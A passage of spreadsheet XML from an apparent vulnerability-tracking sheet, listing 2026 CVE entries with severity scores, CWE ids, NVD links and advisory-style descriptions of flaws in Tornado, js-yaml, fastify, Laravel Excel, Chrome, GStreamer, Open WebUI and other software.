      <c r="I2861" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2861" s="5" t="inlineStr"/>
      <c r="K2861" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-400</t>
        </is>
      </c>
      <c r="L2861" s="5" t="inlineStr">
        <is>
          <t>Tornado is a Python web framework and asynchronous networking library. Prior to 6.5.8, Tornado parses application/x-www-form-urlencoded request bodies with urllib.parse.parse_qs in tornado/escape.py without passing max_num_fields. RequestHandler._execute in tornado/web.py parses the body before handler dispatch through HTTPServerRequest._parse_body and parse_body_arguments in tornado/httputil.py, so an unauthenticated request body containing millions of separator-delimited fields can synchronously stall the single-threaded event loop and delay every connection. The body is bounded only by max_buffer_size, which defaults to 104857600 bytes. This issue is fixed in version 6.5.8.</t>
        </is>
      </c>
      <c r="M2861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82397</t>
        </is>
      </c>
    </row>
    <row r="2862">
      <c r="A2862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="C2862" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2862" s="5" t="inlineStr"/>
      <c r="F2862" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2862" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H286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862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2862" s="5" t="inlineStr"/>
      <c r="K2862" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2862" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="2863">
      <c r="A2863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="C2863" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2863" s="5" t="inlineStr"/>
      <c r="F2863" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2863" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H286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863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2863" s="5" t="inlineStr"/>
      <c r="K2863" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2863" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="2864">
      <c r="A2864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84219</t>
        </is>
      </c>
      <c r="C2864" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2864" s="5" t="inlineStr"/>
      <c r="F2864" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2864" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2864" s="5" t="inlineStr"/>
      <c r="I2864" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2864" s="5" t="inlineStr"/>
      <c r="K2864" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2864" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not hold back every spelling of the HTML entities it decodes when rendering, allowing unauthenticated users to store JavaScript in a comment which then runs in the session of anyone viewing a page that displays it, including an administrator, and on every page of the site when its header or footer is built to show comments.</t>
        </is>
      </c>
      <c r="M2864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84219</t>
        </is>
      </c>
    </row>
    <row r="2865">
      <c r="A2865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84374</t>
        </is>
      </c>
      <c r="C2865" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2865" s="5" t="inlineStr"/>
      <c r="F2865" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2865" s="5" t="inlineStr"/>
      <c r="H2865" s="5" t="inlineStr"/>
      <c r="I2865" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2865" s="5" t="inlineStr"/>
      <c r="K2865" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L2865" s="5" t="inlineStr">
        <is>
          <t>Laravel Excel provides supercharged Excel exports and imports in Laravel. From 3.1.8 until 3.1.70, in src/Files/Disk.php the Maatwebsite\Excel\Files\Disk::copy() method resolves the caller-controlled $destination supplied through Excel::store(), $export-&gt;store(), or storeExcel() against the process working directory with realpath() instead of the configured filesystem disk. If the path names an existing writable file, Disk::copy() opens it with fopen() in rb+ mode and uses stream_copy_to_stream(), bypassing Flysystem path confinement and allowing an attacker whose application input controls the export path to overwrite arbitrary existing files with export content. The rb+ behavior creates a non-truncating overwrite and trailing bytes when the new export is shorter, and overwriting an executable PHP file can lead to remote code execution. This issue is fixed in version 3.1.70.</t>
        </is>
      </c>
      <c r="M2865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84374</t>
        </is>
      </c>
    </row>
    <row r="2866">
      <c r="A2866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="C2866" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2866" s="5" t="inlineStr"/>
      <c r="F2866" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2866" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2866" s="5" t="inlineStr"/>
      <c r="I2866" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2866" s="5" t="inlineStr"/>
      <c r="K2866" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L2866" s="5" t="inlineStr">
        <is>
          <t>js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15.2 and 4.3.2, maxTotalMergeKeys in lib/js-yaml/loader.js and lib/loader.js does not count empty mapping sources while processing the merge key &lt;&lt;. An attacker can alias a large sequence of empty mappings into many merge targets, causing O(N * K) processing while totalMergeKeys remains unchanged and the configured resource limit is never reached. A relatively small YAML document can therefore cause prolonged CPU consumption in applications that parse untrusted YAML, and merge processing is enabled by default on these release lines. This issue is fixed in versions 3.15.2 and 4.3.2.</t>
        </is>
      </c>
      <c r="M2866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="2867">
      <c r="A2867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="C2867" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2867" s="5" t="inlineStr"/>
      <c r="F2867" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2867" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2867" s="5" t="inlineStr"/>
      <c r="I2867" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2867" s="5" t="inlineStr"/>
      <c r="K2867" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L2867" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.12.0, the HTTPX2 content decoders in src/httpx2/httpx2/_decoders.py fully inflate each gzip, deflate, br, or zstd network chunk before iter_bytes() or aiter_bytes() yields bounded pieces to the application. A 64 KiB compressed chunk can expand to approximately 64 MiB in one intermediate allocation, so an attacker-controlled or compromised server can cause severe memory pressure or out-of-memory process termination even when the application streams the response. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M2867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="2868">
      <c r="A2868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84428</t>
        </is>
      </c>
      <c r="C2868" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2868" s="5" t="inlineStr"/>
      <c r="F2868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2868" s="5" t="inlineStr"/>
      <c r="H2868" s="5" t="inlineStr"/>
      <c r="I2868" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2868" s="5" t="inlineStr"/>
      <c r="K2868" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L2868" s="5" t="inlineStr">
        <is>
          <t>fastify versions before 5.12.2 implement the case-insensitive nature of HTTP header names by lowercasing names in a route's header schema before compiling it, but the transformation is incomplete: it lowercases the properties keys and the root-level required array, and does not lowercase the trigger and dependent names inside the JSON Schema Draft 7 dependencies keyword. Because Node stores request header names in lowercase, a canonical-case dependency such as requiring an authentication header whenever a privileged-mode header is present never matches, and the presence assertion is silently skipped. An unauthenticated remote client can therefore send the header that activates a privileged branch while omitting the header the dependency was meant to require, bypassing the conditional check. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M2868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84428</t>
        </is>
      </c>
    </row>
    <row r="2869">
      <c r="A2869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="C2869" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2869" s="5" t="inlineStr"/>
      <c r="F2869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2869" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2869" s="5" t="inlineStr"/>
      <c r="I2869" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2869" s="5" t="inlineStr"/>
      <c r="K2869" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2869" s="5" t="inlineStr">
        <is>
          <t>fastify versions before 5.12.2 decide whether to compile a request schema based on JavaScript truthiness, but JSON Schema Draft 7 defines the boolean false as a valid schema that rejects every instance. When an application assigns false to a route's body, querystring, params, or headers schema to deny all input, fastify treats it as a missing schema, compiles no validator, and runs the route handler on any request. An unauthenticated remote client can therefore reach a handler that a valid deny-all schema was intended to make unreachable, a complete validation bypass that can lead to unauthorized state changes or execution of disabled operations. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M2869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="2870">
      <c r="A2870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84821</t>
        </is>
      </c>
      <c r="C2870" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2870" s="5" t="inlineStr"/>
      <c r="F2870" s="5" t="inlineStr"/>
      <c r="G2870" s="5" t="inlineStr"/>
      <c r="H2870" s="5" t="inlineStr"/>
      <c r="I2870" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2870" s="5" t="inlineStr"/>
      <c r="K2870" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2870" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WP Fast Total Search &lt;= 1.82.284 versions.</t>
        </is>
      </c>
      <c r="M2870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84821</t>
        </is>
      </c>
    </row>
    <row r="2871">
      <c r="A2871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85045</t>
        </is>
      </c>
      <c r="C2871" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2871" s="5" t="inlineStr"/>
      <c r="F2871" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2871" s="5" t="inlineStr"/>
      <c r="H2871" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2871" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2871" s="5" t="inlineStr"/>
      <c r="K2871" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2871" s="5" t="inlineStr">
        <is>
          <t>Race condition in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M2871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85045</t>
        </is>
      </c>
    </row>
    <row r="2872">
      <c r="A2872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85124</t>
        </is>
      </c>
      <c r="C2872" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2872" s="5" t="inlineStr"/>
      <c r="F2872" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2872" s="5" t="inlineStr"/>
      <c r="H2872" s="5" t="inlineStr">
        <is>
          <t>fastify:fastify\/http-proxy</t>
        </is>
      </c>
      <c r="I2872" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2872" s="5" t="inlineStr"/>
      <c r="K2872" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2872" s="5" t="inlineStr">
        <is>
          <t>@fastify/http-proxy versions before 11.6.2 do not validate proxied HTTP request paths for backslash based dot-segments before forwarding them to the configured upstream. The plain HTTP request handler skips the destination validation that the WebSocket path performs, and the underlying reply-from library only rejects forward-slash traversal, so a request containing backslash dot-segments can escape the boundary set by the prefix and rewritePrefix options. An unauthenticated network attacker can use this to reach upstream paths that were meant to stay hidden behind the proxy, resulting in disclosure of internal endpoints. This is a path traversal issue (CWE-22). Users should upgrade to @fastify/http-proxy 11.6.2 or later.</t>
        </is>
      </c>
      <c r="M2872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85124</t>
        </is>
      </c>
    </row>
    <row r="2873">
      <c r="A2873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85150</t>
        </is>
      </c>
      <c r="C2873" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2873" s="5" t="inlineStr"/>
      <c r="F2873" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2873" s="5" t="inlineStr"/>
      <c r="H2873" s="5" t="inlineStr"/>
      <c r="I2873" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2873" s="5" t="inlineStr"/>
      <c r="K2873" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2873" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference flaw was found in GStreamer's RTSP support library. The vulnerability occurs while parsing an Authorization or WWW-Authenticate header that uses Digest authentication. Specially crafted whitespace placement around a parameter's terminator can cause an internal length calculation to underflow, leading to a crash of the process parsing the header. On an RTSP server this can be triggered by a remote, unauthenticated attacker sending a single malformed request when the server has authentication enabled; the same flaw can also be triggered against an RTSP client by a malicious or compromised RTSP server. Successful exploitation results in a denial of service (application crash) and has no confirmed impact on confidentiality or integrity.</t>
        </is>
      </c>
      <c r="M2873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85150</t>
        </is>
      </c>
    </row>
    <row r="2874">
      <c r="A2874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85400</t>
        </is>
      </c>
      <c r="C2874" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2874" s="5" t="inlineStr"/>
      <c r="F2874" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2874" s="5" t="inlineStr"/>
      <c r="H2874" s="5" t="inlineStr"/>
      <c r="I2874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2874" s="5" t="inlineStr"/>
      <c r="K2874" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-862</t>
        </is>
      </c>
      <c r="L2874" s="5" t="inlineStr">
        <is>
          <t>Backend administrators without system maintainer privileges were able to schedule any of the configuration:read, configuration:set, and configuration:show commands. This allowed them to modify arbitrary system configuration, which is normally limited to system maintainers. As a consequence, this allowed them, for example, to gain system maintainer privileges or cause a denial of service. Exploiting this vulnerability requires an administrator-level backend user account. This issue affects TYPO3 CMS versions 14.2.0-14.3.6.</t>
        </is>
      </c>
      <c r="M2874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t>
        </is>
      </c>
    </row>
    <row r="2875">
      <c r="A2875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85505</t>
        </is>
      </c>
      <c r="C2875" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2875" s="5" t="inlineStr"/>
      <c r="F2875" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2875" s="5" t="inlineStr"/>
      <c r="H2875" s="5" t="inlineStr"/>
      <c r="I2875" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2875" s="5" t="inlineStr"/>
      <c r="K2875" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2875" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer over-read in ipmi_oem_fujitsu_get_sel_entry_long_text in ipmi-oem/ipmi-oem-fujitsu.c when a BMC provides a short response, a different vulnerability than CVE-2026-50031 (which has different affected versions).</t>
        </is>
      </c>
      <c r="M2875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85505</t>
        </is>
      </c>
    </row>
    <row r="2876">
      <c r="A2876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86093</t>
        </is>
      </c>
      <c r="C2876" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2876" s="5" t="inlineStr"/>
      <c r="F2876" s="5" t="inlineStr"/>
      <c r="G2876" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H2876" s="5" t="inlineStr"/>
      <c r="I2876" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2876" s="5" t="inlineStr"/>
      <c r="K2876" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2876"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M2876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86093</t>
        </is>
      </c>
    </row>
    <row r="2877">
      <c r="A2877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86287</t>
        </is>
      </c>
      <c r="C2877" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2877" s="5" t="inlineStr"/>
      <c r="F2877" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2877" s="5" t="inlineStr"/>
      <c r="H2877" s="5" t="inlineStr"/>
      <c r="I2877" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2877" s="5" t="inlineStr"/>
      <c r="K2877" s="5" t="inlineStr">
        <is>
          <t>CWE-1287</t>
        </is>
      </c>
      <c r="L2877" s="5" t="inlineStr">
        <is>
          <t>Net::IP::LPM versions before 1.12 for Perl accept malformed prefix lengths.
Non-numeric and non-ASCII prefix lengths are accepted and treated as 0. Integers over 31 bits are silently truncated.  A single malformed mask will poison the lookup table.
The result is that the lookup will silently succeed for every address. An allow-list will allow every address, and a deny-list will block every address.</t>
        </is>
      </c>
      <c r="M2877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86287</t>
        </is>
      </c>
    </row>
    <row r="2878">
      <c r="A2878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86711</t>
        </is>
      </c>
      <c r="C2878" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2878" s="5" t="inlineStr"/>
      <c r="F2878" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2878" s="5" t="inlineStr"/>
      <c r="H2878" s="5" t="inlineStr"/>
      <c r="I2878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2878" s="5" t="inlineStr"/>
      <c r="K2878" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="L2878" s="5" t="inlineStr">
        <is>
          <t>electerm before 5.3.15 exposes 40+ main-process functions through an unvalidated Electron IPC handler with no function-name allowlist or sender validation. Renderer-side script execution can invoke openFileWithEditor and other functions with arbitrary arguments to execute system commands in the main process.</t>
        </is>
      </c>
      <c r="M2878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t>
        </is>
      </c>
    </row>
    <row r="2879">
      <c r="A2879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87011</t>
        </is>
      </c>
      <c r="C2879" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2879" s="5" t="inlineStr"/>
      <c r="F2879" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2879" s="5" t="inlineStr"/>
      <c r="H2879" s="5" t="inlineStr"/>
      <c r="I2879" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2879" s="5" t="inlineStr"/>
      <c r="K2879" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-770</t>
        </is>
      </c>
      <c r="L2879" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.1, the unauthenticated POST /oauth/backchannel-logout handler in backend/open_webui/utils/oauth.py fetched the OIDC discovery document and signing keys before validating a submitted logout token. Each request repeated uncached network fetches, and the signing-key lookup blocked the async event loop, so requests carrying invalid tokens could stall the single-worker instance and amplify traffic to the identity provider when ENABLE_OAUTH_BACKCHANNEL_LOGOUT was enabled. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M2879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87011</t>
        </is>
      </c>
    </row>
    <row r="2880">
      <c r="A2880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87431</t>
        </is>
      </c>
      <c r="C2880" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2880" s="5" t="inlineStr"/>
      <c r="F2880" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2880" s="5" t="inlineStr"/>
      <c r="H2880" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2880" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2880" s="5" t="inlineStr"/>
      <c r="K2880" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2880" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M2880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87431</t>
        </is>
      </c>
    </row>
    <row r="2881">
      <c r="A2881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87450</t>
        </is>
      </c>
      <c r="C2881" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2881" s="5" t="inlineStr"/>
      <c r="F2881" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2881" s="5" t="inlineStr"/>
      <c r="H2881" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2881" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2881" s="5" t="inlineStr"/>
      <c r="K2881" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2881" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Permissions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M2881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87450</t>
        </is>
      </c>
    </row>
    <row r="2882">
      <c r="A2882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87601</t>
        </is>
      </c>
      <c r="C2882" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2882" s="5" t="inlineStr"/>
      <c r="F2882" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2882" s="5" t="inlineStr"/>
